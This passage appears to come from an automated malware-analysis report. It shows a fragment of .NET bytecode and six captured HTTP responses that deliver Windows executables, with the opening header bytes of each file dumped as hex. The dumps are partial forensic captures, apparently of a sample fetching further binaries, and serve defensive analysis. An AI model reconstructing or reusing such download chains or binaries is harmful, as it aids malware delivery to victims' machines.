00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Dec 2023 17:12:41 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 27 Dec 2023 17:00:01 GMTETag: "2ce00-60d80bad775ec"Accept-Ranges: bytesContent-Length: 183808Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c4 6c 00 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 2a 02 00 00 d2 42 00 00 00 00 00 a9 3c 00 00 00 10 00 00 00 40 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 44 00 00 04 00 00 69 05 03 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 6b 02 00 64 00 00 00 00 90 44 00 40 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 41 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 5e 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c2 28 02 00 00 10 00 00 00 2a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 34 00 00 00 40 02 00 00 36 00 00 00 2e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 06 42 00 00 80 02 00 00 18 00 00 00 64 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 51 00 00 00 90 44 00 00 52 00 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:58 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:13:14 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:13:16 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:13:18 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:13:20 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:13:24 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 